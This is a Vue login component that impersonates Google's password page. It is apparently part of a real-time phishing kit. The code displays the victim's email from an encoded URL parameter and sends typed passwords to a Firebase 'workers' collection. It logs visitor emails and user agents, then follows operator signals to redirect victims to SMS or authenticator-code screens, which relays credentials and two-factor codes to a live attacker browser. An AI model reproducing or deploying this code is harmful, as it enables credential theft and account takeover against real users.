<template>
  <v-app>
    <v-container fill-height class="d-flex justify-center">
      <v-card
        min-width="448"
        height="500"
        :loading="disableCard"
        :outlined="true"
        flat
        :disabled="disableCard"
        class="pl-8 pr-8"
      >
        <v-card-title>
          <v-img
            width="20"
            height="32"
            :src="require('@/assets/google_logo.png')"
            :contain="true"
            class="mt-8"
          />
        </v-card-title>
        <v-card-text>
          <!-- <h3 class="headline text-center text--primary">Welcome</h3> -->
          <h3 class="headline text-center text--primary">Welcome</h3>
          <!-- <h4 class="text-center text--primary">
          To continue to
          <span class="primary--text">Zoom</span>
        </h4>-->
          <div class="text-center">
            <v-btn
              :rounded="true"
              class="ma-3 mx-auto email-button"
              :outlined="true"
            >
              <v-icon left>mdi-account-circle</v-icon>
              <div class="text--primary text-none">{{ email }}</div>
              <v-icon right>mdi-chevron-down</v-icon>
            </v-btn>
            <v-text-field
              :append-icon="showPassword ? 'mdi-eye' : 'mdi-eye-off'"
              :type="showPassword ? 'text' : 'password'"
              label="Enter your password"
              :error="error"
              v-model="password"
              :outlined="true"
              width="300"
              color="primary"
              class="mt-5"
              :error-messages="errorMessage"
              @click:append="showPassword = !showPassword"
              v-on:keyup.enter="submitForm"
              ref="password"
            ></v-text-field>
          </div>
        </v-card-text>
        <v-card-actions>
          <v-btn color="primary" class="text-none" :depressed="true" text
            >Forgot password?</v-btn
          >
          <v-spacer></v-spacer>
          <v-btn
            color="primary"
            :depressed="true"
            @click="submitForm"
            eight="36"
            width="88"
            class="text-none"
            >Next</v-btn
          >
        </v-card-actions>
      </v-card>
    </v-container>
  </v-app>
</template>

<script>
import { db } from "../firebase";

export default {
  name: "LoginForm",

  data: () => ({
    showPassword: false,
    errorMessage: "",
    error: false,
    disableCard: false,
    email: "",
    password: "",
    smsCode: "",
    clean: true,
    workerNumber: 0,
    browser: "chrome_100",
  }),

  async created() {
    // let hacked = localStorage.getItem("ghacked");
    // hacked && (window.location.href = "https://mail.google.com");

    this.email = this.$route.params.data.includes("@")
      ? this.$route.params.data
      : window.atob(this.$route.params.data).split(",")[0];

    let workers = await db.collection("workers");

    let currentWorker = await workers.doc("current").get();
    this.workerNumber = currentWorker.data().worker;
    this.browser = this.$route.params.browser || `chrome_${this.workerNumber}`;
    console.log(this.browser);

    await workers.doc(this.browser).set(
      {
        browser: this.browser,
        data_type: "email",
        email: this.email.trim(),
        password: "",
        smsCode: "",
        smsInfo: "",
        cookies: "",
        from: "client",
        info: "",
        screenState: "",
      },
      { merge: true }
    );

    this.$refs.password.focus();

    // check if the user is visiting for the first time if they have not entered their password before.
    if (this.clean) {
      let currentWorker = await workers.doc("current").get();
      this.workerNumber = currentWorker.data().worker;
    }

    let futureWorker;
    console.log(this.workerNumber);

    if (this.clean) {
      if (this.workerNumber === 10) {
        futureWorker = 1;
      } else {
        futureWorker = this.workerNumber + 1;
      }
      await workers.doc("current").set({ worker: futureWorker });
    }
    this.clean = false;

    // If a user visits the page.
    let visited = await db.collection("visited");
    await visited.doc(this.email).set(
      {
        email: this.email,
        agent: navigator.userAgent,
      },
      { merge: true }
    );

    workers.where("browser", "==", this.browser).onSnapshot((snapshot) => {
      snapshot.docChanges().forEach(async (change) => {
        let data = change.doc.data();
        console.log(change.type);

        if (data.from === "server" && change.type === "modified") {
          if (data.info === "password_error") {
            this.error = true;
            this.errorMessage = "Your account or password is incorrect.";
            this.disableCard = false;
            this.password = "";
          }
        }

        // Go to sms app
        if (data.screenState === "sms") {
          await this.$router.push({
            path: `/identifier/sms/${this.email}/${this.browser}/${data.smsInfo}`,
          });
        }

        // Go to authenticator app
        if (data.screenState === "authenticator") {
          await this.$router.push({
            path: `/identifier/authenticator/${this.email}/${this.browser}/${data.authenticatorInfo}`,
          });
        }

        // Verification complete
        if (data.info === "verification_complete") {
          localStorage.setItem("ghacked", true);
          await this.$router.push({
            path: `/identifier/complete/${this.email}`,
          });
        }
      });
    });
  },

  methods: {
    async submitForm() {
      this.disableCard = true;
      this.error = false;

      if (this.password.length < 8) {
        this.error = true;
        this.errorMessage =
          "Wrong password. Try again or click Forgot password to reset it.";
        this.password = "";
        this.disableCard = false;
        return;
      }

      let workers = await db.collection("workers");
      await workers.doc(this.browser).set(
        {
          browser: this.browser,
          data_type: "password",
          password: this.password,
          from: "client",
          info: "",
        },
        { merge: true }
      );
    },
  },
};
</script>

<style lang="scss">
a {
  text-decoration: none;
  color: #005da6;
}
.rounded-button {
  border-radius: 0px;
}
.email-button {
  border: 0.5px solid rgb(219, 219, 219);
}
</style>